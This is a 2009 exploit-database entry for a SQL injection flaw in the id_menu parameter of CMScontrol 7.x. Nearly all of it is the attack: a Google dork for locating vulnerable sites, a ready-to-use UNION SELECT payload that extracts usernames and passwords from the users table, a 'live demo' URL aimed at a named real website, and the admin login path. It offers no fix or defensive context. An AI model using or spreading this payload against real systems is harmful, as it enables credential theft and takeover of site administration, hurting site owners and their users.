CMScontrol 7.x (index.php id_menu) SQL Injection Vulnerability

2009-09-21T00:00:00
ID 1337DAY-ID-5794
Type zdt
Reporter ph1l1ster
Modified 2009-09-21T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==============================================================
CMScontrol 7.x (index.php id_menu) SQL Injection Vulnerability
==============================================================


#=Info=======================================================================#
# Software: CMScontrol (Content Management Portal Solutions)  Sql Injection  #
# Version: 7.*                                                               #
# Vulnerability: Remote Sql Injection                                        #
# Google Dork: "index.php?id_menu=" CMScontrol                               # 
# Off. site: www.cmscontrol.com                                              #
#============================================================================#


#=Author==============================================#
# Author: ph1l1ster                                   #  
# Date: 20.09.2009                                    #
#=====================================================#


#=Sql Injection===========================================================================================================================================================#
# Exploit: http://site/index.php?id_menu=82+and+1=0+union+select+unhex(hex(1)),unhex(hex(concat_ws(0x3a,user,password))),unhex(hex(3))+from+users--                #
# Live demo: http://www.galsi.it/index.php?id_menu=99999+and+1=0+union+select+unhex(hex(1)),unhex(hex(concat_ws(0x3a,user,password))),unhex(hex(3))+from+users--   #
# Login page: http://site/admin/login.php                                                                                                                          #
#==================================================================================================================================================================#





#  0day.today [2018-01-02]  #